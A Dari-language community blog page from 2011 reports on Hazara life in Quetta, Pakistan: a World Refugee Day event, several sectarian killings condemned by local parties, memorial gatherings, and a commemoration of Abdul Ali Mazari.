سپس آقای غلام محمد بهادر مسئول سیاسی و سرپرست جنرال قونسلگری جمهوری اسلامی افغانستان در کویته، روز جهانی مهاجرت را به تمام مهاجرین افغان تبریک و تهنیت گفته از میزبانی مردم و حکومت پاکستان، کمک های همیشگی یو ان اچ سی آر، ادارات و مؤسسات مختلف برای مهاجرین و آوارگان افغان در سه دهه اخیر اظهار سپاس و قدردانی نموده از اداره کمیشنری عالی سازمان ملل متحد در امور پناهندگان و سایر ادارات و مؤسسات خواست که برای رفع مشکلات آب آشامیدنی مهاجرین کمپ های سرانان، مشکلات صحی و  تعلیمی سایر کمپ ها توجه نموده و آنان را یاری رسانند.

به تعقیب آن لیسه حضرت بلال، لیسه استقلال و متوسطه ملت پارچه سرود های ملی و میهنی شان را اجرا نموده و بر زینت بیش از حد محفل افزودند. همچنین جمعی از اطفال خورد سال پارچه تمثیلی را که حاوی زندگی حقیقی اطفال مهاجرین بود، به نمایش گذاشتند.

بعد از آن اتن ملی توسط جمعی از جوانان اجرا گردید. سپس تحایف از قبل تهیه شده توسط آقایان اوزیی بلیزا رئیس یو ان اچ سی آر، ظفرالله بلوچ هوم سکرتر حکومت بلوچستان و الحاج غلام محمد بهادر مسئول سیاسی و سرپرست جنرال قونسلگری جمهوری اسلامی افغانستان برای آنانی که در بخش های مختلف محفل سهم گرفته بودند، توزیع گردید.

در ختم محفل آقای ظفرالله بلوچ هوم سکرتر حکومت بلوچستان محفل امروزه را جمع بندی نموده و از آمادگی کشورش برای همکاری بیشتر به مهاجرین مفصلاً معلومات داده و روز جهانی مهاجرت را به همگان تبریگ گفت.

کار محفل بعد از صرف چای و مصاحبه های مسئولین با رسانه ها پایان یافت.

قابل یاد آوریست که محافل مشابه دیگر در کمپ های سر انان، سرخاب، لورالایی و چاغی از سوی اتشه امور مهاجرین و عودت کنندگان، یو ان اچ سی آر و مؤسسات همکار نیز امروز تدویر یافته بود، که آقای امداد الله عزیز اتشه امور مهاجرین و عودت کنندگان کویته با آقای اورنگ زیب افسر ساحوی یو ان اچ سی آر در محفل کمپ های سرانان اشتراک نموده بودند.

گزارش از: مرتضی خرمی
عکاس: روح الله شاه علم
+ نوشته شده توسط آزادگان در 2011/6/21 و ساعت 9:25 AM |
سید ابرارحسین بوکسر مشهور پاکستان
 
در یک حمله تروریستی در شهر کویته به شهادت رسید!
 
      به ادامه قتل های هدفمندانه یا زنجیره ای اینبار سید ابرار حسین یکتن از بوکسران مشهور پاکستان که در شهر کویته زندگی مینمود روز پنجشنبه مورخ 16جون سالجاری میلادی در نزدیکی ایوب استدیوم مورد حمله مردان مسلح ناشناس قرار گرفته و به شهادت رسید. سید ابرار حسین شاه، یکی از ورزشکاران مردم هزاره و ستاره ورزش پاکستان بود. وی زمانی که از وظیفه اش به طرف خانه بر می گشت، بعد از ظهر دیروز به شهادت رسید.
      گفته میشود آقای شهید  ابرار حسین شاه، به نمایندگی از پاکستان سه بار در مسابقات بوکس المپیک و چندین بار در مسابقات جهانی دیگر و آسیایی شرکت نموده و افتخارات زیاد را برای پاکستان و خصوصا هزاره ها کسب نموده بود. وی بعد از تقاعد سمت معاون دایرکتر پاکستان سپورتس بورد و رئیس ایوب استدیوم، یگانه ورزشگاه بلوچستان برعهده داشت.
     گفته میشود مرمی به سر آقای سید ابرار حسین  اصابت نموده و موصوف  اول زخمی شد. بعد از آنکه وی به شفاخانه نظامی سی ایم اچ انتقال دادند از اثر خونریزی مغزی جان را به جانان سپرد.
      این حادثه المناک خشم هزاره های شهر کویته بر انگیخت و عده ی  از مردم با مسدود نمودن دکانها و مغازه هایشان کشتار هدفمندانه اخیر و شهادت وی را شدیداْ تقبیح و نکوهش نموده و از دولت میخواهند که قاتلین وی را هرچه زود تر گرفتار و به سزای اعمال شان برساند. لشکر جهنگوی طی تماس به رسانه ها مسئولیت کشتن آقای ابرار حسین را بر عهده گرفته اند.
پیکر آقای ابرار حسین عصر دیروز در هزاره قبرستان مهر آباد با حضور ورزشکاران و شخصیت های مختلف به خاک سپرده شد. شهادت موصوف یک ضایعه جبران ناپذیر برای جامعه ورزشکار پاکستان و بخصوص شهر کویته می باشد.
برای رفتن به بیوگرافی و گزارش ویدیویی بالای آدرس ذیل کلیک نمایید.
+ نوشته شده توسط آزادگان در 2011/6/17 و ساعت 9:57 AM |

در اثر حمله افراد ناشناس اے ایس آئی منظور حسین به شهادت رسید

     اے ایس آئی منظور حسین ولد عبدالعزیزیکتن از اعضای پولیس بلوچستان، که در پولیس استیشن زرغون آباد ایفای می وظیفه مینمود لیل ۱۱-۱۲ /۶/۲۰۱۱م، زمانی که بعد از ختم وظیفه با موترسایکل اش به طرف مهرآباد ( علمدار رود )  بر می گشت، در نزدیکی محلی به نام نواں کلی مورد حمله تروریستان نامعلوم قرار گرفته و به شهادت رسید.

شاهدان عینی میگویند که تقریبا بیست مرمی به وی اصابت نموده بود. تروریستان بعد از به شهادت رساندن، منظور حسین از محل حادثه موفق به فرار شدند.

     جنازه شهید اے ایس آئی منظور حسین، که سن وی تقریبا سی و پنج سال بود، بعد از انتقال به امام بارگاه نچاری واقع علمدار رود، روز یک شنبه با حضور تعداد کثیری از مردم و فامیلین وی در هزاره قبرستان - مهرآباد به خاک سپرده شد.

+ نوشته شده توسط آزادگان در 2011/6/15 و ساعت 3:40 PM |

در یک حمله تروریستی دو سرباز پولیس مردم هزاره  شهید و

 دو مرد و یک زن  دیگر زخمی گردیدند!

هنوز اشک ها نخشکیده بود، هنوز بغض گلوی مان صاف نشده بود، که خفاش در کمین نشسته با زهم روز یکشنه مورخ ۲۹ می سال ۲۰۱۱ اسحق علی و موسی هزاره را که هر دو پولیس بودند و بعد از ختم وظیفه ی شان از کلیسای مسیجیان که به سمت حوزه پولیس بروری در حرکت بودند و از سرک سپینی میگذشتند مورد حمله تروریستان قرار گرفته و  به شهادت رسیدند. در این حمله برعلاوه آنها دو مرد و یک زن دیگر که سوار بر تکسی بودند که از مردم هزاره می باشندُ نیز زخمی برداشتند. دشمن قسم خورده باز کینه و کدورت همیشگی اش را تجدید کرد و خانواده های این دو برادر را به سوگ نشاند و ملت ما را عزا دار نمودند.

خاطره من:

روز یکشنبه از اول صبح تا ساعت 1 بعد از ظهر در یک مراسم فاتحه و ختم قرآن شریف بودیم، بچه ها ظروف را میشستند که زنگ های مبایل یک تعداد مان به صدا در آمد. رنگ از صورت همه پرید، زمزمه ها آغاز شد، همه گفتند که اسحق پولیس پدر حمید را شهید کردند، این خبر باور نکردنی بود طاقت و توان از وجود مان پرواز کرد، خستگی و مایوسی تمام وجود مان را فرا گرفت. قرار بود بعد از شستن ظرفها در خانه یکی از بچه ها رفته چند دقیقه رفع خستگی کنیم. پلان همه به هم ریخت، نمیدانم کی و کی ظروف اتحادیه را شست. همه ی ما از داخل حویلی بیرون بر آمدیم . بعد از بحث و مباحثه کوتاه مجبور بودیم به دو گروپ تقسیم شویم. یک تعداد مان باید سر حزیره می رفتیم و مقبره را آماده میکردیم و یک تعداد دیگر ما باید به امامباره قدس رضویه می رفتیم. همه ی بچه ها با دل شکسته بخاطر انجام وظایف شان خسته و کوفته به سوی مقاصد شان حرکت کردند. مسیج دیگر در مبایلم آمد که نوشته شده بود "در این حادثه دو نفر شهید و سه نفر زخمی شده است".بچه ها را گفتم که  من در امامباره می روم - با رئیس اتحادیه عازم امامباره شدیم. بچه های قومی آنها هم بطرف قبرستانی حرکت کردند. از شدت ناراحتی اصلاً هوای گرم را احساس نمیکردیم- عجله داشتیم هر چه زود تر در امامباره برسیم. در امامباره رسیدیم که جنازه را آورده و مردم همه زانوی غم را بغل کرده و چهره ها شاداب و خندان بچه ها و پیرمردان محله جایش را به غم و اندوه خالی کرده است. موتر پولیس آمد و یک اکلیل گل و مبلغ 20000 کلدار را آورده به یکی از همسایه های شهید داده منطقه را ترک کردند. لحظه ی نگذشته بود که حمید نوجوان پسر شهید اسحق  با چشمان پر از اشک - حیران و پریشان وارد امامباره شد و زار زار شروع به گریستن کرد. اشک ریختاندن حمید تمام نشده بود که عبدالله برادر شهید وارد شد. او هم از اینکه برادرش شهید شده بود، چنان گریست که دل همه را کباب کرد، مردم کم کم اضافه  شدند، که گفتند پدر شهید را بخواهید، پدر شهید هم از راه رسید.او یک پیر پیر مرد مهربان، آرام و استوار بود وقتی که وارد امامباره شد، دید حمید و عبدالله گریه می کنند، او هم طاقش طاق شد و اشکهایش  جاری گشت. پدر - برادر و پسر شهید دست ها را به دور گردن یکدیگر شان حلقه نموده به یاد اسحق شهید اشک ماتم ریختند و همه یکصدا ناله کردند وفقدان اسحق را فقط با ناله و زاری و شکایت از چرخش ظالمانه ی زمان پر کردند، جنازه اسحق در غسلخانه ی امامباره که  در زیر زمینی موقعیت دارد - بود. خون بعد از گذشت ساعت ها از گردن اسحق جاری متوقف نمیشد و خونریزی مداوم باعث تکمیل نا شدن آخرین غسلش گردیده می شد. تمام تلاش برای متوقف شدن خون گردن اسحق شهید ادامه داشت. امبولانس آمد و جنازه را به سمت قبرستان حرکت دادیم. این قبرستان، قبرستان چند وقت پیش نیست، تعداد شهدا نسبت به سالهای گذشته در چند هفته اخیر افزایش یافته و تمام شهدا  توسط انسانهای دهشت افگن به شهادت رسیده اند. بعد از یک ساعت وقفه در مسجد قبرستانی - هردو جنازه را برای خاکسپاری آوردند، وقتی که پیکر شهدا را در زمین گذاشتند یک تعداد ناگهان شعارهای ضدو نقیض را سر داده و از خون شهدا سوء استفاده کردند.  این هردو شهید پولیس بود، اما از آمرحوزه پولیس گرفته تا پولیس عادی در موقع دفن آنها نزدیک نیامدندو بدون سلامی دادن نظامی مردم پیکر آنها را بسیار غریبانه بخاک سپردند. برایم سوال پیش آمد که چرا پولیس از شهدای شان قدر دانی نکرد. رسم و رسوم یک شهید را که حین انجام وظیفه به شهادت رسیده انجام ندادند و آنان را حقیر شمردند. در دلم گفتم شاید اینها هزاره هستند و بخاطر همان در این دیار کدام ارزش ندارند. همه برگشتیم و با سوالات زیاد، که چه زمان وضعیت بهتر خواهد شد. اما معلوم نیست که خوبتر از این یا بدتر از این . فاتحه شهید اسحق از سوی خانواده و وابستگانش گرفته شد، اما پولیس برای این خانواده بیگانه بود. خدمات چندین ساله اسحق و موسی هم بدرد شان نخورد. زندگی یعنی این، زندگی موسی و اسحق همین بود که پایان یافت. اطفال یتیم شان منتظر و بی سرپرست باقی ماندند. روحشان شاد و یاد شان گرامی باد.

+ نوشته شده توسط آزادگان در 2011/6/3 و ساعت 10:39 AM |

 در یک حمله تروریستی 5 نفر از مردم هزاره کویته شهید و

 چهار نفر دیگر مجروح شدند

 

ساعت 9 صبح امروز چهار شنبه مورخ ۱۸ می سال ۲۰۱۱ میلادی مطابق با ۲۸ ثور سال ۱۳۹۰ هجری شمسی موتر حامل دکانداران مری آباد که بعد از خریداری سبزی و میوه مورد ضرورت شان از سبزی مارکیت هزارگنجی عازم مری آباد شهر کویته بودند، در ساحه گوهر آباد  اده سریاب مورد حمله افراد ناشناس قرار گرفتتند که از اثر تیر اندازی حمله کنند گان پنج نفر شهید و چهار نفر مجروح شدند. تمام شهدا و مجروحان حادثه مردم هزاره می باشند.
پولیس از دستگیری عاملین این حادثه چیزی به رسانه ها اعلام نکرده و گفته اند که قضیه تحت بررسی قرار دارد.
بعد از کشته شدن اسامه بن لادن این دومین حمله فرقه گرایان مذهبی بالای مردم هزاره شهر کویته می باشد.
احتمال می رود  این حمله را لشکر جهنگوی ( جنگجو ) که مربوط به مخالفین شیعه مذهبان پاکستان است - انجام داده باشند.
همین گروه  مسئولیت حمله مرگبار روز جمعه ششم ماه می سالجاری را که در میدان فوتبال و قبرستان هزاره تاون شهر کویته صورت گرفت نیز بر عهده گرفتند.
بعد از حمله ساحه هزاره تاون - تروریستان مردم هزاره علمدار رود را مورد حمله ی شان قرار دادند.

 

+ نوشته شده توسط آزادگان در 2011/5/18 و ساعت 3:3 PM |

پنج حمله کننده انتحاری در خروت آباد شهر کویته کشته شدند!

عصر دیروز سه شنبه مورخ ۲۷ ثور سالجاری پنج حمله کننده انتحاری که از مناطق کوهستانی شمال شهر کویته وارد این شهر شده بودند- میخواستند وارد شهر کویته شوند موتر حامل آنان در نزدیکی پوسته امنیتی سپاه مرزی ( ایف سی ) واقع خروت آباد شهر کویته توسط این نیروها متوقف میشود که بلا فاصله مهاجمان و انتحار کنندگان از موتر پایین شده و بالای نیروهای ایف سی بم دستی پرتاب مینمایند و بعد از پرتاب بم دستی یکنفر از نیروهای ایف سی شهید و دو نفر دیگر شان مجروح میشوند و درگیری میان مهاجمان و نیروهای امنیتی بوقوع می پیوندد که در نتیجه درگیری هر پنج فرد مهاجم که شامل سه زن و دو مرد بودند کشته می شوند.

کرنل فیصل به رسانه ها گفت که نیروهای امنیتی به اساس اطلاع قبلی آمادگی مقابله با مهاجمان و انتحار کنندگان را داشتند و انتحار کنندگان با استفاده از ماسک از مناطق کوهستانی شمال شهر کویته وارد این شهر شدند که با ممانعت نیروهای ایف سی مواجه و همگی شان کشته شدند.

 کرنل فیصل گفت که تمام مهاجمان مجهز با واسکت انتحاری بودند و به اساس اسناد بدست آمده تمامی آنها شهروندان خارجی از بکستانی و چیچینی می باشند. اجساد مهاجمان بعد از بازدید رسانه ها و مسئولین امنیتی در شفاخانه " بی ایم سی "   شهر کویته منتقل شدند.

بعد از کشته شدن اسامه بن لادن - و حمله ۶ می بالای  میدان فوتبال و حزیره ( قبرستان ) هزاره تاون این دومین حمله  توسط طرفداران بن لادن در شهر کویته می باشد - که صورت گرفته است.

نیروهای امنیتی ( ایف سی ) و پولیس ایالت بلوچستان برای اولین بار است - که مهاجمان مسلح را در یک مقابله رویا رویی و مستقیم از پا در آورده اند.  شاهدان عینی به رسانه ها گفته اند که در جریان درگیری شاهراه چمن کویته برای چندین ساعت به روی ترافیک مسدود گشت. مسئولین ایف سی با اظهار سپاس و قدر دانی از مردم  شهر کویته گفته اند که آنها با تمام توان با تروریزم مقابله نموده و از هیچ گونه قربانی دریغ نخواهند کرد. مسئولیت این حمله را تا کنون کسی بر عهده نگرفته است.

+ نوشته شده توسط آزادگان در 2011/5/18 و ساعت 11:19 AM |
هزاره دموکراتیک پارتی  حمله روز جمعه را به شدت محکوم نمود!

اچ دی پی: مردم باید از حمایت خائینین داخلی پرهیز و قربانی منافع افراد و اشخاص استفاده جو نشوند و بعد از امروز زندگی عادی شان را از سر گرفته و احتیاط لازم را داشته باشند.

ما از حکومت هیچ مطالبه نداریم چون حکومت مطالبات مردم را در نظر ندارد و به آن عمل نمی نماید.

هزاره دموکراتیک پارتی عصر دیروز در بازار علی آباد هزاره تاون طی یک جلسه عمومی که هزاران نفر از هزاره های مقیم شهر  کویته در آن شرکت نموده بودند، حمله روز جمعه را به شدت محکوم کردند. در این جلسه آقایان عبدالخالق هزاره رهبر حزب هزاره دموکراتیک، احمدعلی کوهزاد، عزیزالله هزاره، رضا وکیل و سردار ساحل حمله روز جمعه  مورخ 6 می سال جاری را محکوم و ارگانهای امنیتی را به غفلت و بی کفایتی متهم نموده گفتند که تروریستان با سلاح کلاشنکوف و پیکا و راکت بالای مردم بیگناه مدت 15 الی 20 دقیقه حمله می کند، اما نیروهای امنیتی برای مقابله و یا جلوگیری از وقوع این حادثه هیچ عکس العملی را از خود نشان نمیدهند و نیم ساعت بعد از وقوع حادثه در محل واقعه می رسند. سخنرانان در این محفل مردم را به هوشیاری و بیداری دعوت نموده موضعگیری های اخیر شیعه کنفرانس، اتحاد تاجران، تنظیم نسل نو هزاره مغل، روز نامه آواز نسل نو ، هزاره جرگه وو حدت مسلمین را به باد انتقاد گرفته و سیاست های نهاد های متذکره را درقبال سرنوشت عمومی مردم غیر عادلانه خوانده و موضع گیری های آنها را خلاف منافع مردم و بها دادن به سیاست های ددمنشانه دشمنان مردم توصیف نمودند. سخنرانان محفل گفتند که تروریستان خیلی تلاش کردند تا از طریق دامن زدن به نفاق های قومی و مذهبی به آرزو هایشان برسند که این مسئله بر وفق مراد شان انجام نشد و هزاره دموکراتیک پارتی با حرکت های مسالمت آمیز سیاسی با ایجاد همسویی و هم فکری با سایر احزاب سیاسی بلوچستان  پلان دشمنان را خنثی و روابط نیک و حسنه را میان اقوام ساکن بلوچستان تامین و دهشت افگنان را به شکست مواجه ساخت.  سخنرانان خطاب به مردم گفتند که سیاست های دشمنان صلح و امنیت تغییر نموده اینبار میخواهند افراد مربوط به قوم دیگر را اجیر و به ایجاد تفرقه در میان اقوام باهم برادر بلوچستان دامن بزنند که هزاره دموکراتیک پارتی اجازه چنین کار را به آنان نخواهد داد و رویا های کاذب شان  را بازهم با حرکت های سیاسی مدنی به شکست مواجه خواهند کرد.سخنرانان محفل بردن یک تعداد مردم را توسط بعضی افراد استفاده جو در حزب پشتونخواه  سوال بر انگیز خوانده گفتند که اگر پشتونخواه اینقدر مقتدر می بود، باید از سرقت وسایط باربری و ترانسپورتی برادران پشتون در شاهراه های بلوچستان و کشتار پشتونها که همه روزه در کراچی صورت می گیرد دفاع و جلوگیری مینمودند و اگر یک تعداد برادران رفته دفتر حزب پشتونخواه را در هزاره تاون به خاطر تامین امنیت مردم ایجاد نموده چرا حمله ی روز جمعه صورت گرفت و رفتن مردم در پشتونخواه چه معنا را می رساند در حالیکه خود آنها امنیت خود شان را تامین کرده نمیتواند، امنیت دیگران را چگونه تامین خواهندکرد؟نکند که رفتن برادران در کنار پشتونخواه دستور بیرون مرزی داشته باشد، بخاطری که بلوچ های جدا طلب خواهان یک ایالت مستقل می باشد که تقاضای آنها شمولیت سیستان و بلوچستان ایران در ساختار ایالت جدید بلوچستان است و ایران میخواهد که برادران ما روابط شان را با دشمن دشمنان ایران مستحکم و مردم هزاره را بدون کدام هدف امیدوار کننده همانند حادثه روزجهانی قدس به کام مرگ بفرستند. سخنرانان تاکید کردند، که ما نباید قربانی اهداف سیاست های منطقوی و رفتن در کنار این و آن شویم. ما یک قوم مشخص هستیم و میخواهیم با تمام اقوام بر اساس منافع مردم خود حرف بزنیم و با آنها روابط نیک و حسنه داشته باشیم . حمله روز جمعه را استاد خلیلی و استاد حاج محمد محقق نیز محکوم نموده از آقای آصف علی زرداری رئیس جمهور پاکستان و آقای نواب اسلم رئیسانی وزیر اعلی صوبه بلوچستان خواسته اند که جلو کشتار مردم هزاره را در کویته بگیرند.   مسئولین هزاره دموکراتیک پارتی از مردم خواستند که به زندگی عادی شان ادامه داده و از تهدیدات دشمن نترسند، به ورزش، کارهای فرهنگی و رفتن به قبرستان، مسجد، دکانداری و دوایر دولتی ادامه دهند و در کنار آن نهایت احتیاط را به کار برده و آمادگی مقابله با حوادث را داشته باشند. تمام صحبت های کلیدی سخنرانان با شعار های انقلابی مردم همراهی میشد.  

 
+ نوشته شده توسط آزادگان در 2011/5/9 و ساعت 1:40 PM |

مراسم  فاتحه - قرآن خوانی و یاد بود از شهدای

روز جمعه کویته برگزار شد!

 

امروز یکشنبه مورخ 8 می سالجاری مردم شریف هزاره تاون و خانواده های شهدا طی یک مراسم عمومی، مراسم فاتحه و قرآن خوانی شهدای روز جمعه را از ساعت 8 صبح الی 12 ظهر در امامباره قدس رضویه واقع بلاک سوم هزاره تاون شهر کویته به شکل دستجمعی برگزار نمودند.همزمان با فاتحه مردانه فاتحه زنانه در خانه های شهدا نیز طور جدا برگزار گردید.

در این مراسم فاتحه و ختم قرآن عظیم الشان هزاران نفر از اهالی هزاره تاون، شهروندان شریف شهر کویته، اعضای بنیاد شهید مزاری ( ره )، عبدالخالق هزاره با کابینه و اعضای حزب هزاره دموکراتیک، نهاد های علمی و فرهنگی، جمعی کثیری از علما و روحانیون، وزیر ایجوکیشن کوالتی بلوچستان در مراسم فاتحه شهدا هریک حاجی ابراهیم ، علیداد، جانعلی، جواد، اسماعیل و بی بی حکیمه شرکت نموده و با خانواده های شهدا اظهار همدردی و غم شریکی نمودند.

در جریان مراسم فاتحه و ختم قرآن عظیم الشان علما و روحانیون بر علاوه فاتحه امروز ده روز را به عنوان روز عزای عمومی و روز جمعه پیشرو را روز فاتحه عمومی از سوی علما و روحانیون در کتابخانه شهید محمد منتظری اعلام نموده از مردم خواستند که با حضور پرشور شان در آن مراسم شرکت نمایند.

همچنین مواصلت پیام های تسلیت استاد محمد کریم خلیلی معاون ریاست جمهوری و رهبر حزب وحدت اسلامی افغانستان، استاد حاج محمد محقق عضو پارلمان و رهبر حزب وحدت اسلامی مردم افغانستان، جنرال قونسلگری جمهوری اسلامی افغانستان مقیم کویته، بنیاد شهید مزاری و حزب هزاره دموکراتیک پارتی توسط مرتضی خرمی قرائت و اعلام شد. استاد محمد کریم خلیلی و استاد حاج محمد محقق حمله تروریستی دشمنان صلح و امنیت را که روز جمعه بالای اهالی شریف هزاره تاون کویته صورت گرفته بود را شدیداً تقبیح و مردم شهید پرور کویته را به صبر و بردباری، استقامت و پایمردی، وحدت و همدلی فرا خواندند.

در اخیر مراسم محترم جانعلی چنگیزی وزیر ایجوکیشن کوالتی بلوچستان حمله روز جمه تروریستان را یک حمله بزدلانه توصیف نموده و شهادت شش تن شهدا را مایه آبرو و عزت مردم خوانده گفت: دشمنان با این حملات تروریستی و نا جوانمردانه نمی توانند هیچ خللی برای مردم ما ایجاد کنند، چون مردم ما یک مردم صلح دوست، با امن و مترقی می باشند و دشمن هیچگاه توان رویارویی با مردم ما را نداشته و با حملات بزدلانه و دزدانه ی شان میخواهند این مردم غیرتمند را بترسانند، که آنها کور خوانده اند و ملت ما از برکت خون همین شهدا در سطح دنیا معرفی شدند.

بعد از ختم مراسم فاتحه و قرآن عظیم الشان محترم میر صادق عمرانی رئیس حزب مردم در بلوچستان، محترم علی مدد جهتک وزیر ایالتی و سردار محمد امان گورگیچ عضو پارلمان حکومت بلوچستان در خانه شهید جانعلی تشریف آورده و شهادت موصوف را یک ضایع عظیم دانسته بر وحدت و همدلی مردم بلوچستان و ایستاد شدن در برابر تروریستان تاکید نموده و به روح پاک شهدا اتحاف دعا نمودند. آقای جانعلی چنگیزی و مرتضی خرمی تشریف آوری آنان را خیر مقدم گفته و از احساسات نیک و غم شریکی شان با خانواده های شهدا اظهار سپاس و قدر دانی نمودند. آقای جانعلی چنگیزی با میر صادق عمرانی ، علی مدد جهتک و سردار محمد امان گورگیچ برای فاتحه خوانی عازم منازل پنج شهید دیگر واقعه روز جمعه شدند.

مراسم فاتحه خوانی امروز در فضای کاملاً امن برگزار و یک مراسم بی سابقه در هزاره تاون توصیف شده است. در این مراسم تمام اقشار جامعه از پیرو جوان غنی و غریب شرکت نموده وحدت و همدلی ملی و اسلامی شان را به نمایش گذاشتند.

حزب هزاره دموکراتیک پارتی نیز بمنظور تقبیح این جنایت هولناک تروریستان کوردل ساعت چهار عصر امروز جلسه ی مردمی دارند، تا اوضاع و احوال سیاسی کشور و جامعه را به اطلاع مردم رسانده و موقف سیاسی شان را اعلام کنند.

+ نوشته شده توسط آزادگان در 2011/5/8 و ساعت 4:1 PM |

در یک حمله تروریستی در قبرستان هزاره تاون شهر کویته

8 نفر شهید و  15 نفر دیگر مجروح شدند.

امروز جمعه مورخ 6 می سال 2011 میلادی ، ساعت شش و نیم صبح چند نفر افراد  ناشناس که سوار به دو عراده موتر دادسن و آلتو بودند مسلح با سلاح کلاشینکوف، پیکا و راکت بالای مردم ساحه هزاره تاون که بخاطر فاتحه خوانی برای روح اموات شان در قبرستان هزاره تاون و جمعی از ورزشکاران جوان که مصروف بازی فوتبال در نزدیکی قبرستان متذکره بودند حمله کردند. در این حمله که  حدود  نیم ساعت ادامه یافت، حمله کنندگان با تیراندازی پیاپی توسط کلاشنکوف و پیکا و چهار فیر مرمی راکت نوع آر پی جی 7 مردم و خانه های نزدیک قبرستان را مورد حمله قرار دادند، که در نتیجه تعداد 8 نفر شهید و 15 نفر مجروح شدند.  این حمله،یک حمله کاملاً جنگی و سازمان یافته بود، که صدای شلیک گلوله ها و انفجار راکت ها فضای تمام شهر کویته و بخصوص ساحه هزاره تاون را پر نموده بود. شاهدان عینی می گویند: " که حمله کنندگان با دو عراده موتر نوع دادسن و آل تو از سمت هزار گنجی در سرک بالایی قبرستان که بنام سرک بیپاس مغربی یاد میشود آمده و در مقابل قبرستان از موتر هایشان پیاده و سه نفر را که در نزدیکی سرک در کنارهم نشسته بودند، مورد حمله قرار داده و آنها را به شهادت رساندند و سپس بالای مردم که مصروف فاتحه خوانی در مقبره های عزیزان و اقارب شان مصروف بودند و تعدادی از جوانان که  فوتبال میکردند تیر اندازی نمودند و بعد از تیراندازی متداوم به پرتاب مرمی راکت نیز متوصل شدند که گلوله های راکت در یک منزل مسکونی، درون باغ و یک مقبره اصابت نمود. حمله کنندگان بعد از گذشت نیم ساعت تیر اندازی به شکل بسیار آرام سوار بر موترهایشان شده ساحه را ترک نمودند. بعد از رفتن حمله کنندگان به سمت هزارگنجی و سرک کرانی نیم ساعت بعد پولیس در منطقه آمده و منطقه را تحت محاصره شان در آوردند، اما به تعقیب حمله کنندگان نپرداختند و امبولانس ها در محل واقعه آمده شهدا و زخمی ها را به شفاخانه های بولان و سی ام اچ انتقال دادند و مردم حاضر در قبرستان و نواحی اطراف آن به نشانه اعتراض و رسیدگی به خواست هایشان که دستگیری عاملین این فاجعه هولناک بود، سرک عمومی بیپاس مغربی را مسدود نمودند". بعد از گذشت یک ساعت حمله، حمله کنندگان برای مردم شهر کویته مشخص نبود و رسانه ها بعد از یکساعت از وقوع حادثه به ارایه گزارش پرداختند. مسئولین حزب هزاره دموکراتیک پارتی، شیعه کنفرانس وهزاره جرگه در محل حادثه رسیده حمله نا جوانمردانه، حمله کنندگان را  که بالای مردم هزاره تاون صورت گرفته بود شدیداً تقبیح و خواهان دستگیری عاملین آن از سوی حکومت شده و مردم را به برد باری صبر و تحمل و آرامی دعوت نمودند. بعد از انتقال زخمی ها و شهدا به شفاخانه های بولان و سی ام اچ مردم دسته دسته جهت عیادت، دادن خون برای مجروحین حادثه و انتقال پیکر شهدا به مساجد و امامبارگاه ها رهسپار گردیدند. مسئولین پولیس از آغاز تحقیقات و پیگیری عاملین این فاجعه خبر دادند. رئیس جمهور، نخست وزیر، احزاب سیاسی مطرح پاکستان و مسئولین حکومت بلوچستان وقوع این حادثه را شدیداْ تقبیح و خواهان دستگیری عاملین قضیه شدند. 


ادامه مطلب
+ نوشته شده توسط آزادگان در 2011/5/7 و ساعت 1:41 AM |

 

شانزدهمین سالگرد شهادت رهبر شهید استاد مزاری بزرگ از

سوی بنیاد شهید مزاری ( ره )  درکویته تجلیل شد!

دیروز یکشنبه - مورخ 13 مارچ مطابق با 22 حوت که مصادف با شانزدهمین سالگرد شهادت رهبر شهید استاد عبـــدالعلی مزاری (  ره ) رهبر فقید حزب وحدت اسلامی افغانستان، پیشوای شهید واولین منادی وحدت ملی وعدالت اجتماعی در کشور و شش تن همراهان آن مرشد شهید بود ـ طی یک محفل با شکوه و وزین که از سوی بنیاد شهید مزاری مقیم کویته در ماشاالله شادی هال واقع بازار علی آباد تدویر یافته بود، شماری زیادی از شخصیت های مختلف علمی، فرهنگی، اجتماعی، احزاب سیاسی، نمایندگان اقوام، مسئولین، اساتید، شاگردان مکاتب هزاره تاون و نهاد های تعلیمی، فرهنگی و ورزشی ـ رئیس و معاون اتشه امور مهاجرین و عودت کنندگان، معاون دفتر ترانسپورت، علما، محاسن سفیدان، شورای داکتران و جمعی کثیری از خواهران و مادران و بخصوص یاران و سنگرداران رهبر شهید در مقاومت های غرب کابل، بامیان، پروان، غزنی و مزارشریف و هئیت رهبری بنیاد شهید مزاری  اشتراک نموده بودند.

شبکه کیبل النور که یک شبکه خانوادگی می باشد، شب بیست و دوم حوت سخنرانی های رهبر شهید و اعلان فراخوان محفل بنیاد شهید مزاری را تا ساعت 2 بعد از ظهر نشر نمود که این کار در شهر کویته بی سابقه بوده و موتر تبلیغات مزین با عکس های رهبر شهید در کوچه و پس کوچه های هزاره تاون مردم را جهت اشتراک در محفل شانزدهمین سالگرد شهادت رهبر شهید فراخوانده و یاد خاطرات رهبر شهید را در اذهان مردم همیشه در صحنه و شهید پرور هزاره زنده نمودند.

ساعت 2 بعد از ظهر گروه های سرود که از هفته های پیش آمادگی گرفته بودند پشت سرهم با مردم عزا دار داخل ماشاالله شادی هال شده وجمعی از برادران و خواهران که شامل دو گروپ استقبال از مهمانان و انتظامات بودند ـ ملبث با لباس های سیاه که نشانه ی سوگ و عزاداری می باشد، مهمانان را در داخل هال پذیرایی و استقبال نمودند. اعضای محترم هزاره دموکراتیک پارتی نیز مسئولیت تامین امنیت بیرون از هال را به شکل بسیار عالی تامین و نظارت مینمودند. بنر تسلیت نامه بنیاد شهید مزاری و خوش آمدید از مهمانان بالای جاده  بازار علی آباد، دو تصویر بزرگ مزین با عکس رهبر شهید و یک عکس دیگر مزین با عکس استادان عالیقدر، استاد مزاری شهید، استاد خلیلی رهبر حزب وحدت اسلامی افغانستان و استاد حاج محمد محقق رهبر حزب وحدت اسلامی مردم افغانستان در ساختمان ماشاء الله شادی هال نصب و تزئین گردیده بود. در داخل هال هم چوکی ها برای مردم به شکل احسن پوش و چیده شده بودند تا مردم و پیروان رهبر شهید در موقع نشستن احساس خستگی و ناراحتی ننمایند. ستیژ با عکس های رهبر شهید و شهدای همراهش و استاد خلیلی و استاد محقق و بنرهای زیاد مزین با کلمات کلیدی رهبر شهید و دیدگاه های شخصیت های مختلف در مورد آن منادی عدالت و وفاق ملی به هال زینت بیشتر بخشیده بود.

